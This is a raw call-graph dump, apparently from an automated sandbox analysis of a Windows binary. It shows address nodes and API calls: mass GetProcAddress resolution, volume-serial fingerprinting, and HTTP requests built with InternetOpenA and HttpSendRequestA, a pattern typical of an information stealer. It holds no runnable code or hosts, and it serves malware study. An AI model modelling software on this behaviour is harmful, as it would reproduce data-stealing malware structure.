79316->79134 79317->79148 79319 416dc2 79318->79319 79320 416dec 79319->79320 79321 416dda lstrcpy 79319->79321 79320->79153 79321->79320 79323 416d40 lstrcpy 79322->79323 79324 4134f3 79323->79324 79325 416fb0 4 API calls 79324->79325 79326 413505 79325->79326 79327 416ea0 lstrcpy 79326->79327 79328 41350e 79327->79328 79329 416fb0 4 API calls 79328->79329 79330 413527 79329->79330 79331 416ea0 lstrcpy 79330->79331 79332 413530 79331->79332 79333 416fb0 4 API calls 79332->79333 79334 41354a 79333->79334 79335 416ea0 lstrcpy 79334->79335 79336 413553 79335->79336 79337 416fb0 4 API calls 79336->79337 79338 41356c 79337->79338 79339 416ea0 lstrcpy 79338->79339 79340 413575 79339->79340 79341 416fb0 4 API calls 79340->79341 79342 41358f 79341->79342 79343 416ea0 lstrcpy 79342->79343 79344 413598 79343->79344 79345 416fb0 4 API calls 79344->79345 79346 4135b3 79345->79346 79347 416ea0 lstrcpy 79346->79347 79348 4135bc 79347->79348 79349 416da0 lstrcpy 79348->79349 79350 4135d0 79349->79350 79350->79160 79352 416e12 79351->79352 79352->79163 79354 416e3f 79353->79354 79355 412be0 79354->79355 79356 416e7b lstrcpy 79354->79356 79355->79173 79356->79355 79358 4043b0 2 API calls 79357->79358 79359 4025a4 79358->79359 79360 4043b0 2 API calls 79359->79360 79361 4025bd 79360->79361 79362 4043b0 2 API calls 79361->79362 79363 4025d6 79362->79363 79364 4043b0 2 API calls 79363->79364 79365 4025ef 79364->79365 79366 4043b0 2 API calls 79365->79366 79367 402608 79366->79367 79368 4043b0 2 API calls 79367->79368 79369 402621 79368->79369 79370 4043b0 2 API calls 79369->79370 79371 40263a 79370->79371 79372 4043b0 2 API calls 79371->79372 79373 402653 79372->79373 79374 4043b0 2 API calls 79373->79374 79375 40266c 79374->79375 79376 4043b0 2 API calls 79375->79376 79377 402685 79376->79377 79378 4043b0 2 API calls 79377->79378 79379 40269e 79378->79379 79380 4043b0 2 API calls 79379->79380 79381 4026b7 79380->79381 79382 4043b0 2 API calls 79381->79382 79383 4026d0 79382->79383 79384 4043b0 2 API calls 79383->79384 79385 4026e9 79384->79385 79386 4043b0 2 API calls 79385->79386 79387 402702 79386->79387 79388 4043b0 2 API calls 79387->79388 79389 40271b 79388->79389 79390 4043b0 2 API calls 79389->79390 79391 402734 79390->79391 79392 4043b0 2 API calls 79391->79392 79393 40274d 79392->79393 79394 4043b0 2 API calls 79393->79394 79395 402766 79394->79395 79396 4043b0 2 API calls 79395->79396 79397 40277f 79396->79397 79398 4043b0 2 API calls 79397->79398 79399 402798 79398->79399 79400 4043b0 2 API calls 79399->79400 79401 4027b1 79400->79401 79402 4043b0 2 API calls 79401->79402 79403 4027ca 79402->79403 79404 4043b0 2 API calls 79403->79404 79405 4027e3 79404->79405 79406 4043b0 2 API calls 79405->79406 79407 4027fc 79406->79407 79408 4043b0 2 API calls 79407->79408 79409 402815 79408->79409 79410 4043b0 2 API calls 79409->79410 79411 40282e 79410->79411 79412 4043b0 2 API calls 79411->79412 79413 402847 79412->79413 79414 4043b0 2 API calls 79413->79414 79415 402860 79414->79415 79416 4043b0 2 API calls 79415->79416 79417 402879 79416->79417 79418 4043b0 2 API calls 79417->79418 79419 402892 79418->79419 79420 4043b0 2 API calls 79419->79420 79421 4028ab 79420->79421 79422 4043b0 2 API calls 79421->79422 79423 4028c4 79422->79423 79424 4043b0 2 API calls 79423->79424 79425 4028dd 79424->79425 79426 4043b0 2 API calls 79425->79426 79427 4028f6 79426->79427 79428 4043b0 2 API calls 79427->79428 79429 40290f 79428->79429 79430 4043b0 2 API calls 79429->79430 79431 402928 79430->79431 79432 4043b0 2 API calls 79431->79432 79433 402941 79432->79433 79434 4043b0 2 API calls 79433->79434 79435 40295a 79434->79435 79436 4043b0 2 API calls 79435->79436 79437 402973 79436->79437 79438 4043b0 2 API calls 79437->79438 79439 40298c 79438->79439 79440 4043b0 2 API calls 79439->79440 79441 4029a5 79440->79441 79442 4043b0 2 API calls 79441->79442 79443 4029be 79442->79443 79444 4043b0 2 API calls 79443->79444 79445 4029d7 79444->79445 79446 4043b0 2 API calls 79445->79446 79447 4029f0 79446->79447 79448 4043b0 2 API calls 79447->79448 79449 402a09 79448->79449 79450 4043b0 2 API calls 79449->79450 79451 402a22 79450->79451 79452 4043b0 2 API calls 79451->79452 79453 402a3b 79452->79453 79454 4043b0 2 API calls 79453->79454 79455 402a54 79454->79455 79456 4043b0 2 API calls 79455->79456 79457 402a6d 79456->79457 79458 4043b0 2 API calls 79457->79458 79459 402a86 79458->79459 79460 4043b0 2 API calls 79459->79460 79461 402a9f 79460->79461 79462 4043b0 2 API calls 79461->79462 79463 402ab8 79462->79463 79464 4043b0 2 API calls 79463->79464 79465 402ad1 79464->79465 79466 4043b0 2 API calls 79465->79466 79467 402aea 79466->79467 79468 4043b0 2 API calls 79467->79468 79469 402b03 79468->79469 79470 4043b0 2 API calls 79469->79470 79471 402b1c 79470->79471 79472 4043b0 2 API calls 79471->79472 79473 402b35 79472->79473 79474 4043b0 2 API calls 79473->79474 79475 402b4e 79474->79475 79476 4043b0 2 API calls 79475->79476 79477 402b67 79476->79477 79478 4043b0 2 API calls 79477->79478 79479 402b80 79478->79479 79480 4043b0 2 API calls 79479->79480 79481 402b99 79480->79481 79482 4043b0 2 API calls 79481->79482 79483 402bb2 79482->79483 79484 4043b0 2 API calls 79483->79484 79485 402bcb 79484->79485 79486 4043b0 2 API calls 79485->79486 79487 402be4 79486->79487 79488 4043b0 2 API calls 79487->79488 79489 402bfd 79488->79489 79490 4043b0 2 API calls 79489->79490 79491 402c16 79490->79491 79492 4043b0 2 API calls 79491->79492 79493 402c2f 79492->79493 79494 4043b0 2 API calls 79493->79494 79495 402c48 79494->79495 79496 4043b0 2 API calls 79495->79496 79497 402c61 79496->79497 79498 4043b0 2 API calls 79497->79498 79499 402c7a 79498->79499 79500 4043b0 2 API calls 79499->79500 79501 402c93 79500->79501 79502 4043b0 2 API calls 79501->79502 79503 402cac 79502->79503 79504 4043b0 2 API calls 79503->79504 79505 402cc5 79504->79505 79506 4043b0 2 API calls 79505->79506 79507 402cde 79506->79507 79508 4043b0 2 API calls 79507->79508 79509 402cf7 79508->79509 79510 4043b0 2 API calls 79509->79510 79511 402d10 79510->79511 79512 4043b0 2 API calls 79511->79512 79513 402d29 79512->79513 79514 4043b0 2 API calls 79513->79514 79515 402d42 79514->79515 79516 4043b0 2 API calls 79515->79516 79517 402d5b 79516->79517 79518 4043b0 2 API calls 79517->79518 79519 402d74 79518->79519 79520 4043b0 2 API calls 79519->79520 79521 402d8d 79520->79521 79522 4043b0 2 API calls 79521->79522 79523 402da6 79522->79523 79524 4043b0 2 API calls 79523->79524 79525 402dbf 79524->79525 79526 4043b0 2 API calls 79525->79526 79527 402dd8 79526->79527 79528 4043b0 2 API calls 79527->79528 79529 402df1 79528->79529 79530 4043b0 2 API calls 79529->79530 79531 402e0a 79530->79531 79532 4043b0 2 API calls 79531->79532 79533 402e23 79532->79533 79534 4043b0 2 API calls 79533->79534 79535 402e3c 79534->79535 79536 4043b0 2 API calls 79535->79536 79537 402e55 79536->79537 79538 4043b0 2 API calls 79537->79538 79539 402e6e 79538->79539 79540 4043b0 2 API calls 79539->79540 79541 402e87 79540->79541 79542 4043b0 2 API calls 79541->79542 79543 402ea0 79542->79543 79544 4043b0 2 API calls 79543->79544 79545 402eb9 79544->79545 79546 4043b0 2 API calls 79545->79546 79547 402ed2 79546->79547 79548 4043b0 2 API calls 79547->79548 79549 402eeb 79548->79549 79550 4043b0 2 API calls 79549->79550 79551 402f04 79550->79551 79552 4043b0 2 API calls 79551->79552 79553 402f1d 79552->79553 79554 4043b0 2 API calls 79553->79554 79555 402f36 79554->79555 79556 4043b0 2 API calls 79555->79556 79557 402f4f 79556->79557 79558 4043b0 2 API calls 79557->79558 79559 402f68 79558->79559 79560 4043b0 2 API calls 79559->79560 79561 402f81 79560->79561 79562 4043b0 2 API calls 79561->79562 79563 402f9a 79562->79563 79564 4043b0 2 API calls 79563->79564 79565 402fb3 79564->79565 79566 4043b0 2 API calls 79565->79566 79567 402fcc 79566->79567 79568 4043b0 2 API calls 79567->79568 79569 402fe5 79568->79569 79570 4043b0 2 API calls 79569->79570 79571 402ffe 79570->79571 79572 4043b0 2 API calls 79571->79572 79573 403017 79572->79573 79574 4043b0 2 API calls 79573->79574 79575 403030 79574->79575 79576 4043b0 2 API calls 79575->79576 79577 403049 79576->79577 79578 4043b0 2 API calls 79577->79578 79579 403062 79578->79579 79580 4043b0 2 API calls 79579->79580 79581 40307b 79580->79581 79582 4043b0 2 API calls 79581->79582 79583 403094 79582->79583 79584 4043b0 2 API calls 79583->79584 79585 4030ad 79584->79585 79586 4043b0 2 API calls 79585->79586 79587 4030c6 79586->79587 79588 4043b0 2 API calls 79587->79588 79589 4030df 79588->79589 79590 4043b0 2 API calls 79589->79590 79591 4030f8 79590->79591 79592 4043b0 2 API calls 79591->79592 79593 403111 79592->79593 79594 4043b0 2 API calls 79593->79594 79595 40312a 79594->79595 79596 4043b0 2 API calls 79595->79596 79597 403143 79596->79597 79598 4043b0 2 API calls 79597->79598 79599 40315c 79598->79599 79600 4043b0 2 API calls 79599->79600 79601 403175 79600->79601 79602 4043b0 2 API calls 79601->79602 79603 40318e 79602->79603 79604 4043b0 2 API calls 79603->79604 79605 4031a7 79604->79605 79606 4043b0 2 API calls 79605->79606 79607 4031c0 79606->79607 79608 4043b0 2 API calls 79607->79608 79609 4031d9 79608->79609 79610 4043b0 2 API calls 79609->79610 79611 4031f2 79610->79611 79612 4043b0 2 API calls 79611->79612 79613 40320b 79612->79613 79614 4043b0 2 API calls 79613->79614 79615 403224 79614->79615 79616 4043b0 2 API calls 79615->79616 79617 40323d 79616->79617 79618 4043b0 2 API calls 79617->79618 79619 403256 79618->79619 79620 4043b0 2 API calls 79619->79620 79621 40326f 79620->79621 79622 4043b0 2 API calls 79621->79622 79623 403288 79622->79623 79624 4043b0 2 API calls 79623->79624 79625 4032a1 79624->79625 79626 4043b0 2 API calls 79625->79626 79627 4032ba 79626->79627 79628 4043b0 2 API calls 79627->79628 79629 4032d3 79628->79629 79630 4043b0 2 API calls 79629->79630 79631 4032ec 79630->79631 79632 4043b0 2 API calls 79631->79632 79633 403305 79632->79633 79634 4043b0 2 API calls 79633->79634 79635 40331e 79634->79635 79636 4043b0 2 API calls 79635->79636 79637 403337 79636->79637 79638 4043b0 2 API calls 79637->79638 79639 403350 79638->79639 79640 4043b0 2 API calls 79639->79640 79641 403369 79640->79641 79642 4043b0 2 API calls 79641->79642 79643 403382 79642->79643 79644 4043b0 2 API calls 79643->79644 79645 40339b 79644->79645 79646 4043b0 2 API calls 79645->79646 79647 4033b4 79646->79647 79648 4043b0 2 API calls 79647->79648 79649 4033cd 79648->79649 79650 4043b0 2 API calls 79649->79650 79651 4033e6 79650->79651 79652 4043b0 2 API calls 79651->79652 79653 4033ff 79652->79653 79654 4043b0 2 API calls 79653->79654 79655 403418 79654->79655 79656 4043b0 2 API calls 79655->79656 79657 403431 79656->79657 79658 4043b0 2 API calls 79657->79658 79659 40344a 79658->79659 79660 4043b0 2 API calls 79659->79660 79661 403463 79660->79661 79662 4043b0 2 API calls 79661->79662 79663 40347c 79662->79663 79664 4043b0 2 API calls 79663->79664 79665 403495 79664->79665 79666 4043b0 2 API calls 79665->79666 79667 4034ae 79666->79667 79668 4043b0 2 API calls 79667->79668 79669 4034c7 79668->79669 79670 4043b0 2 API calls 79669->79670 79671 4034e0 79670->79671 79672 4043b0 2 API calls 79671->79672 79673 4034f9 79672->79673 79674 4043b0 2 API calls 79673->79674 79675 403512 79674->79675 79676 4043b0 2 API calls 79675->79676 79677 40352b 79676->79677 79678 4043b0 2 API calls 79677->79678 79679 403544 79678->79679 79680 4043b0 2 API calls 79679->79680 79681 40355d 79680->79681 79682 4043b0 2 API calls 79681->79682 79683 403576 79682->79683 79684 4043b0 2 API calls 79683->79684 79685 40358f 79684->79685 79686 4043b0 2 API calls 79685->79686 79687 4035a8 79686->79687 79688 4043b0 2 API calls 79687->79688 79689 4035c1 79688->79689 79690 4043b0 2 API calls 79689->79690 79691 4035da 79690->79691 79692 4043b0 2 API calls 79691->79692 79693 4035f3 79692->79693 79694 4043b0 2 API calls 79693->79694 79695 40360c 79694->79695 79696 4043b0 2 API calls 79695->79696 79697 403625 79696->79697 79698 4043b0 2 API calls 79697->79698 79699 40363e 79698->79699 79700 4043b0 2 API calls 79699->79700 79701 403657 79700->79701 79702 4043b0 2 API calls 79701->79702 79703 403670 79702->79703 79704 4043b0 2 API calls 79703->79704 79705 403689 79704->79705 79706 4043b0 2 API calls 79705->79706 79707 4036a2 79706->79707 79708 4043b0 2 API calls 79707->79708 79709 4036bb 79708->79709 79710 4043b0 2 API calls 79709->79710 79711 4036d4 79710->79711 79712 4043b0 2 API calls 79711->79712 79713 4036ed 79712->79713 79714 4043b0 2 API calls 79713->79714 79715 403706 79714->79715 79716 4043b0 2 API calls 79715->79716 79717 40371f 79716->79717 79718 4043b0 2 API calls 79717->79718 79719 403738 79718->79719 79720 4043b0 2 API calls 79719->79720 79721 403751 79720->79721 79722 4043b0 2 API calls 79721->79722 79723 40376a 79722->79723 79724 4043b0 2 API calls 79723->79724 79725 403783 79724->79725 79726 4043b0 2 API calls 79725->79726 79727 40379c 79726->79727 79728 4043b0 2 API calls 79727->79728 79729 4037b5 79728->79729 79730 4043b0 2 API calls 79729->79730 79731 4037ce 79730->79731 79732 4043b0 2 API calls 79731->79732 79733 4037e7 79732->79733 79734 4043b0 2 API calls 79733->79734 79735 403800 79734->79735 79736 4043b0 2 API calls 79735->79736 79737 403819 79736->79737 79738 4043b0 2 API calls 79737->79738 79739 403832 79738->79739 79740 4043b0 2 API calls 79739->79740 79741 40384b 79740->79741 79742 4043b0 2 API calls 79741->79742 79743 403864 79742->79743 79744 4043b0 2 API calls 79743->79744 79745 40387d 79744->79745 79746 4043b0 2 API calls 79745->79746 79747 403896 79746->79747 79748 4043b0 2 API calls 79747->79748 79749 4038af 79748->79749 79750 4043b0 2 API calls 79749->79750 79751 4038c8 79750->79751 79752 4043b0 2 API calls 79751->79752 79753 4038e1 79752->79753 79754 4043b0 2 API calls 79753->79754 79755 4038fa 79754->79755 79756 4043b0 2 API calls 79755->79756 79757 403913 79756->79757 79758 4043b0 2 API calls 79757->79758 79759 40392c 79758->79759 79760 4043b0 2 API calls 79759->79760 79761 403945 79760->79761 79762 4043b0 2 API calls 79761->79762 79763 40395e 79762->79763 79764 4043b0 2 API calls 79763->79764 79765 403977 79764->79765 79766 4043b0 2 API calls 79765->79766 79767 403990 79766->79767 79768 4043b0 2 API calls 79767->79768 79769 4039a9 79768->79769 79770 4043b0 2 API calls 79769->79770 79771 4039c2 79770->79771 79772 4043b0 2 API calls 79771->79772 79773 4039db 79772->79773 79774 4043b0 2 API calls 79773->79774 79775 4039f4 79774->79775 79776 4043b0 2 API calls 79775->79776 79777 403a0d 79776->79777 79778 4043b0 2 API calls 79777->79778 79779 403a26 79778->79779 79780 4043b0 2 API calls 79779->79780 79781 403a3f 79780->79781 79782 4043b0 2 API calls 79781->79782 79783 403a58 79782->79783 79784 4043b0 2 API calls 79783->79784 79785 403a71 79784->79785 79786 4043b0 2 API calls 79785->79786 79787 403a8a 79786->79787 79788 4043b0 2 API calls 79787->79788 79789 403aa3 79788->79789 79790 4043b0 2 API calls 79789->79790 79791 403abc 79790->79791 79792 4043b0 2 API calls 79791->79792 79793 403ad5 79792->79793 79794 4043b0 2 API calls 79793->79794 79795 403aee 79794->79795 79796 4043b0 2 API calls 79795->79796 79797 403b07 79796->79797 79798 4043b0 2 API calls 79797->79798 79799 403b20 79798->79799 79800 4043b0 2 API calls 79799->79800 79801 403b39 79800->79801 79802 4043b0 2 API calls 79801->79802 79803 403b52 79802->79803 79804 4043b0 2 API calls 79803->79804 79805 403b6b 79804->79805 79806 4043b0 2 API calls 79805->79806 79807 403b84 79806->79807 79808 4043b0 2 API calls 79807->79808 79809 403b9d 79808->79809 79810 4043b0 2 API calls 79809->79810 79811 403bb6 79810->79811 79812 4043b0 2 API calls 79811->79812 79813 403bcf 79812->79813 79814 4043b0 2 API calls 79813->79814 79815 403be8 79814->79815 79816 4043b0 2 API calls 79815->79816 79817 403c01 79816->79817 79818 4043b0 2 API calls 79817->79818 79819 403c1a 79818->79819 79820 4043b0 2 API calls 79819->79820 79821 403c33 79820->79821 79822 4043b0 2 API calls 79821->79822 79823 403c4c 79822->79823 79824 4043b0 2 API calls 79823->79824 79825 403c65 79824->79825 79826 4043b0 2 API calls 79825->79826 79827 403c7e 79826->79827 79828 4043b0 2 API calls 79827->79828 79829 403c97 79828->79829 79830 4043b0 2 API calls 79829->79830 79831 403cb0 79830->79831 79832 4043b0 2 API calls 79831->79832 79833 403cc9 79832->79833 79834 4043b0 2 API calls 79833->79834 79835 403ce2 79834->79835 79836 4043b0 2 API calls 79835->79836 79837 403cfb 79836->79837 79838 4043b0 2 API calls 79837->79838 79839 403d14 79838->79839 79840 4043b0 2 API calls 79839->79840 79841 403d2d 79840->79841 79842 4043b0 2 API calls 79841->79842 79843 403d46 79842->79843 79844 4043b0 2 API calls 79843->79844 79845 403d5f 79844->79845 79846 4043b0 2 API calls 79845->79846 79847 403d78 79846->79847 79848 4043b0 2 API calls 79847->79848 79849 403d91 79848->79849 79850 4043b0 2 API calls 79849->79850 79851 403daa 79850->79851 79852 4043b0 2 API calls 79851->79852 79853 403dc3 79852->79853 79854 4043b0 2 API calls 79853->79854 79855 403ddc 79854->79855 79856 4043b0 2 API calls 79855->79856 79857 403df5 79856->79857 79858 4043b0 2 API calls 79857->79858 79859 403e0e 79858->79859 79860 4043b0 2 API calls 79859->79860 79861 403e27 79860->79861 79862 4043b0 2 API calls 79861->79862 79863 403e40 79862->79863 79864 4043b0 2 API calls 79863->79864 79865 403e59 79864->79865 79866 4043b0 2 API calls 79865->79866 79867 403e72 79866->79867 79868 4043b0 2 API calls 79867->79868 79869 403e8b 79868->79869 79870 4043b0 2 API calls 79869->79870 79871 403ea4 79870->79871 79872 4043b0 2 API calls 79871->79872 79873 403ebd 79872->79873 79874 4043b0 2 API calls 79873->79874 79875 403ed6 79874->79875 79876 4043b0 2 API calls 79875->79876 79877 403eef 79876->79877 79878 4043b0 2 API calls 79877->79878 79879 403f08 79878->79879 79880 4043b0 2 API calls 79879->79880 79881 403f21 79880->79881 79882 4043b0 2 API calls 79881->79882 79883 403f3a 79882->79883 79884 4043b0 2 API calls 79883->79884 79885 403f53 79884->79885 79886 4043b0 2 API calls 79885->79886 79887 403f6c 79886->79887 79888 4043b0 2 API calls 79887->79888 79889 403f85 79888->79889 79890 4043b0 2 API calls 79889->79890 79891 403f9e 79890->79891 79892 4043b0 2 API calls 79891->79892 79893 403fb7 79892->79893 79894 4043b0 2 API calls 79893->79894 79895 403fd0 79894->79895 79896 4043b0 2 API calls 79895->79896 79897 403fe9 79896->79897 79898 4043b0 2 API calls 79897->79898 79899 404002 79898->79899 79900 4043b0 2 API calls 79899->79900 79901 40401b 79900->79901 79902 4043b0 2 API calls 79901->79902 79903 404034 79902->79903 79904 4043b0 2 API calls 79903->79904 79905 40404d 79904->79905 79906 4043b0 2 API calls 79905->79906 79907 404066 79906->79907 79908 4043b0 2 API calls 79907->79908 79909 40407f 79908->79909 79910 4043b0 2 API calls 79909->79910 79911 404098 79910->79911 79912 4043b0 2 API calls 79911->79912 79913 4040b1 79912->79913 79914 4043b0 2 API calls 79913->79914 79915 4040ca 79914->79915 79916 4043b0 2 API calls 79915->79916 79917 4040e3 79916->79917 79918 4043b0 2 API calls 79917->79918 79919 4040fc 79918->79919 79920 4043b0 2 API calls 79919->79920 79921 404115 79920->79921 79922 4043b0 2 API calls 79921->79922 79923 40412e 79922->79923 79924 4043b0 2 API calls 79923->79924 79925 404147 79924->79925 79926 4043b0 2 API calls 79925->79926 79927 404160 79926->79927 79928 4043b0 2 API calls 79927->79928 79929 404179 79928->79929 79930 4043b0 2 API calls 79929->79930 79931 404192 79930->79931 79932 4043b0 2 API calls 79931->79932 79933 4041ab 79932->79933 79934 4043b0 2 API calls 79933->79934 79935 4041c4 79934->79935 79936 4043b0 2 API calls 79935->79936 79937 4041dd 79936->79937 79938 4043b0 2 API calls 79937->79938 79939 4041f6 79938->79939 79940 4043b0 2 API calls 79939->79940 79941 40420f 79940->79941 79942 4043b0 2 API calls 79941->79942 79943 404228 79942->79943 79944 4043b0 2 API calls 79943->79944 79945 404241 79944->79945 79946 4043b0 2 API calls 79945->79946 79947 40425a 79946->79947 79948 4043b0 2 API calls 79947->79948 79949 404273 79948->79949 79950 4043b0 2 API calls 79949->79950 79951 40428c 79950->79951 79952 4043b0 2 API calls 79951->79952 79953 4042a5 79952->79953 79954 4043b0 2 API calls 79953->79954 79955 4042be 79954->79955 79956 4043b0 2 API calls 79955->79956 79957 4042d7 79956->79957 79958 4043b0 2 API calls 79957->79958 79959 4042f0 79958->79959 79960 4043b0 2 API calls 79959->79960 79961 404309 79960->79961 79962 4043b0 2 API calls 79961->79962 79963 404322 79962->79963 79964 4043b0 2 API calls 79963->79964 79965 40433b 79964->79965 79966 4043b0 2 API calls 79965->79966 79967 404354 79966->79967 79968 4043b0 2 API calls 79967->79968 79969 40436d 79968->79969 79970 4043b0 2 API calls 79969->79970 79971 404386 79970->79971 79972 4043b0 2 API calls 79971->79972 79973 40439f 79972->79973 79974 416240 79973->79974 79975 416250 43 API calls 79974->79975 79976 416666 8 API calls 79974->79976 79975->79976 79977 416776 79976->79977 79978 4166fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79976->79978 79979 416783 8 API calls 79977->79979 79980 416846 79977->79980 79978->79977 79979->79980 79981 4168c8 79980->79981 79982 41684f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79980->79982 79983 4168d5 6 API calls 79981->79983 79984 416967 79981->79984 79982->79981 79983->79984 79985 416974 9 API calls 79984->79985 79986 416a4f 79984->79986 79985->79986 79987 416ad2 79986->79987 79988 416a58 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79986->79988 79989 416adb GetProcAddress GetProcAddress 79987->79989 79990 416b0c 79987->79990 79988->79987 79989->79990 79991 416b45 79990->79991 79992 416b15 GetProcAddress GetProcAddress 79990->79992 79993 416b52 8 API calls 79991->79993 79994 416c15 79991->79994 79992->79991 79993->79994 79995 416c7f 79994->79995 79996 416c1e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79994->79996 79997 416ca1 79995->79997 79998 416c88 GetProcAddress 79995->79998 79996->79995 79999 412cc6 79997->79999 80000 416caa GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79997->80000 79998->79997 79999->79183 80000->79999 80002 4141f0 GetVolumeInformationA 80001->80002 80003 4141e9 80001->80003 80004 41422e 80002->80004 80003->80002 80005 414299 GetProcessHeap HeapAlloc 80004->80005 80006 4142c5 wsprintfA 80005->80006 80007 4142b6 80005->80007 80009 416d40 lstrcpy 80006->80009 80008 416d40 lstrcpy 80007->80008 80010 412d94 80008->80010 80009->80010 80010->79203 80012 416da0 lstrcpy 80011->80012 80013 404559 80012->80013 80826 404470 80013->80826 80015 404565 80016 416d40 lstrcpy 80015->80016 80017 404597 80016->80017 80018 416d40 lstrcpy 80017->80018 80019 4045a4 80018->80019 80020 416d40 lstrcpy 80019->80020 80021 4045b1 80020->80021 80022 416d40 lstrcpy 80021->80022 80023 4045be 80022->80023 80024 416d40 lstrcpy 80023->80024 80025 4045cb InternetOpenA StrCmpCA 80024->80025 80026 404604 80025->80026 80027 404b8b InternetCloseHandle 80026->80027 80838 415260 80026->80838 80029 404ba8 80027->80029 80853 4094a0 CryptStringToBinaryA 80029->80853 80030 404623 80846 416f20 80030->80846 80033 404636 80035 416ea0 lstrcpy 80033->80035 80041 40463f 80035->80041 80036 416e20 2 API calls 80037 404bc5 80036->80037 80039 416fb0 4 API calls 80037->80039 80038 404be7 codecvt 80043 416da0 lstrcpy 80038->80043 80040 404bdb 80039->80040 80042 416ea0 lstrcpy 80040->80042 80044 416fb0 4 API calls 80041->80044 80042->80038 80056 404c17 80043->80056 80045 404669 80044->80045 80046 416ea0 lstrcpy 80045->80046 80047 404672 80046->80047 80048 416fb0 4 API calls 80047->80048 80049 404691 80048->80049 80050 416ea0 lstrcpy 80049->80050 80051 40469a 80050->80051 80052 416f20 3 API calls 80051->80052 80053 4046b8 80052->80053 80054 416ea0 lstrcpy 80053->80054 80055 4046c1 80054->80055 80057 416fb0 4 API calls 80055->80057 80056->79206 80058 4046e0 80057->80058 80059 416ea0 lstrcpy 80058->80059 80060 4046e9 80059->80060 80061 416fb0 4 API calls 80060->80061 80062 404708 80061->80062 80063 416ea0 lstrcpy 80062->80063 80064 404711 80063->80064 80065 416fb0 4 API calls 80064->80065 80066 40473d 80065->80066 80067 416f20 3 API calls 80066->80067 80068 404744 80067->80068 80069 416ea0 lstrcpy 80068->80069 80070 40474d 80069->80070 80071 404763 InternetConnectA 80070->80071 80071->80027 80072 404793 HttpOpenRequestA 80071->80072 80074 4047e8 80072->80074 80075 404b7e InternetCloseHandle 80072->80075 80076 416fb0 4 API calls 80074->80076 80075->80027 80077 4047fc 80076->80077 80078 416ea0 lstrcpy 80077->80078 80079 404805 80078->80079 80080 416f20 3 API calls 80079->80080 80081 404823 80080->80081 80082 416ea0 lstrcpy 80081->80082 80083 40482c 80082->80083 80084 416fb0 4 API calls 80083->80084 80085 40484b 80084->80085 80086 416ea0 lstrcpy 80085->80086 80087 404854 80086->80087 80088 416fb0 4 API calls 80087->80088 80089 404875 80088->80089 80090 416ea0 lstrcpy 80089->80090 80091 40487e 80090->80091 80092 416fb0 4 API calls 80091->80092 80093 40489e 80092->80093 80094 416ea0 lstrcpy 80093->80094 80095 4048a7 80094->80095 80096 416fb0 4 API calls 80095->80096 80097 4048c6 80096->80097 80098 416ea0 lstrcpy 80097->80098 80099 4048cf 80098->80099 80100 416f20 3 API calls 80099->80100 80101 4048ed 80100->80101 80102 416ea0 lstrcpy 80101->80102 80103 4048f6 80102->80103 80104 416fb0 4 API calls 80103->80104 80105 404915 80104->80105 80106 416ea0 lstrcpy 80105->80106 80107 40491e 80106->80107 80108 416fb0 4 API calls 80107->80108 80109 40493d 80108->80109 80110 416ea0 lstrcpy 80109->80110 80111 404946 80110->80111 80112 416f20 3 API calls 80111->80112 80113 404964 80112->80113 80114 416ea0 lstrcpy 80113->80114 80115 40496d 80114->80115 80116 416fb0 4 API calls 80115->80116 80117 40498c 80116->80117 80118 416ea0 lstrcpy 80117->80118 80119 404995 80118->80119 80120 416fb0 4 API calls 80119->80120 80121 4049b6 80120->80121 80122 416ea0 lstrcpy 80121->80122 80123 4049bf 80122->80123 80124 416fb0 4 API calls 80123->80124 80125 4049df 80124->80125 80126 416ea0 lstrcpy 80125->80126 80127 4049e8 80126->80127 80128 416fb0 4 API calls 80127->80128 80129 404a07 80128->80129 80130 416ea0 lstrcpy 80129->80130 80131 404a10 80130->80131 80132 416f20 3 API calls 80131->80132 80133 404a2e 80132->80133 80134 416ea0 lstrcpy 80133->80134 80135 404a37 80134->80135 80136 416d40 lstrcpy 80135->80136 80137 404a52 80136->80137 80138 416f20 3 API calls 80137->80138 80139 404a73 80138->80139 80140 416f20 3 API calls 80139->80140 80141 404a7a 80140->80141 80142 416ea0 lstrcpy 80141->80142 80143 404a86 80142->80143 80144 404aa7 lstrlen 80143->80144 80145 404aba 80144->80145 80146 404ac3 lstrlen 80145->80146 80852 4170d0 80146->80852 80148 404ad3 HttpSendRequestA 80149 404af2 InternetReadFile 80148->80149 80150 404b27 InternetCloseHandle 80149->80150 80155 404b1e 80149->80155 80152 416e00 80150->80152 80152->80075 80153 416fb0 4 API calls 80153->80155 80154 416ea0 lstrcpy 80154->80155 80155->80149 80155->80150 80155->80153 80155->80154 80862 4170d0 80156->80862 80158 40fb04 StrCmpCA 80159 40fb17 80158->80159 80160 40fb0f ExitProcess 80158->80160 80161 40fb27 strtok_s 80159->80161 80173 40fb34 80161->80173 80162 40fccc 80162->79208 80163 40fca8 strtok_s 80163->80173 80164 40fc8b StrCmpCA 80164->80163 80164->80173 80165 40fc6c StrCmpCA 80165->80173 80166 40fb9d StrCmpCA 80166->80173 80167 40fbed StrCmpCA 80167->80173 80168 40fc4d StrCmpCA 80168->80173 80169 40fc2e StrCmpCA 80169->80173 80170 40fbbf StrCmpCA 80170->80173 80171 40fc0f StrCmpCA 80171->80173 80172 416e20 lstrlen lstrcpy 80172->80173 80173->80162 80173->80163 80173->80164 80173->80165 80173->80166 80173->80167 80173->80168 80173->80169 80173->80170 80173->80171 80173->80172 80175 416da0 lstrcpy 80174->80175 80176 401513 80175->80176 80177 416da0 lstrcpy 80176->80177 80178 401525 80177->80178 80179 416da0 lstrcpy 80178->80179 80180 401537 80179->80180 80181 416da0 lstrcpy 80180->80181 80182 401549 80181->80182 80183 405610 80182->80183 80184 416da0 lstrcpy 80183->80184 80185 405629 80184->80185 80186 404470 3 API calls 80185->80186 80187 405635 80186->80187 80188 416d40 lstrcpy 80187->80188 80189 40566a 80188->80189 80190 416d40 lstrcpy 80189->80190 80191 405677 80190->80191 80192 416d40 lstrcpy 80191->80192 80193 405684 80192->80193 80194 416d40 lstrcpy 80193->80194 80195 405691 80194->80195 80196 416d40 lstrcpy 80195->80196 80197 40569e InternetOpenA StrCmpCA 80196->80197 80198 4056cd 80197->80198 80199 405c70 InternetCloseHandle 80198->80199 80201 415260 3 API calls 80198->80201 80200 405c8d 80199->80200 80203 4094a0 4 API calls 80200->80203 80202 4056ec 80201->80202 80204 416f20 3 API calls 